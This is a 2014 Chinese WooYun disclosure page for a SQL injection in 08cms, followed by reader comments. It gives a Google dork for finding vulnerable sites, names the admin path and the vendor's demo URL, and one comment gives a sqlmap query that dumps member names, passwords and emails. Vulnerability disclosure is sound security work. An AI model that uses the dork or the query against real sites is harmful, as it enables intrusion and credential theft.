当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050206

漏洞标题:08cms通用0day SQL注射漏洞

相关厂商:08cms

漏洞作者: Murk Emissary

提交时间:2014-02-02 17:06

修复时间:2014-03-19 17:06

公开时间:2014-03-19 17:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通杀08cms所有版本

详细说明:

通用型SQL注射
谷歌关键字
inurl:member/index.php?ugid31=51
在网站后面加上/admina.php就是后台

漏洞证明:

随便找个站点就可以注射

3.jpg


官方的演示站点也可以秒进后台
http://auto.08cms.com/member/index.php?ugid31=51

3333.jpg


修复方案:

过滤

版权声明:转载请注明来源 Murk Emissary@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:12 (WooYun评价)


漏洞评价:

评论

  1. 2014-02-03 16:19 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    我是厂商,我认为该漏洞不重要,请尽快公布。

  2. 2014-02-04 19:41 | vipons ( 普通白帽子 | Rank:284 漏洞数:65 | *^◎^*)

    厂商忽略

  3. 2014-02-06 19:04 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    如果不出意外,肯定是直接给忽略了~

  4. 2014-02-06 19:17 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @saline 不可能忽略,肯定是无人认领 然后公开。

  5. 2014-02-07 12:03 | 灰色 ( 实习白帽子 | Rank:31 漏洞数:12 | 在细微的安全隐患也会成为突破的缺口!)

    厂商已经主动忽略漏洞,细节向公众公开

  6. 2014-02-07 17:17 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    相关厂商: 08cms通用性oday

  7. 2014-03-19 18:19 | PanFake ( 路人 | Rank:6 漏洞数:5 | 略懂略懂)

    180多个表。。。得多有耐心。。。

  8. 2014-03-20 11:20 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    @PanFake 没必要啊,第一个出现确定后缀后直接 --sql-shellSELECT concat(0x3a,mname,0x3a,password,0x3a,email,0x3a) from cms_members limit 0,1 耐心等待就好了。不过这个玩意好像只有汽车才开启了

  9. 2014-03-20 12:05 | PanFake ( 路人 | Rank:6 漏洞数:5 | 略懂略懂)

    @saline 嗯,要是知道在哪就方便多了!

  10. 2014-03-22 12:09 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @疯狗 求WYB

  11. 2014-05-02 16:08 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    貌似N年久有了!不过你能挖掘出来还可以!

  12. 2014-11-17 15:57 | 写个七 ( 路人 | Rank:4 漏洞数:1 | 一点一点积累。)

    @动后河 逗比 搞笑